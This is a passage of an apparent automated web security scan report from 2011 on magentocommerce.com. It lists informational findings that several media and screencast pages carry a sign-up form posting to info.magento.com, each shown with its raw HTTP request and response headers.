<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.69. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.70. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.71. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.72. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.73. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.74. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.75. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.76. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.77. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.78. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.79. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.80. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
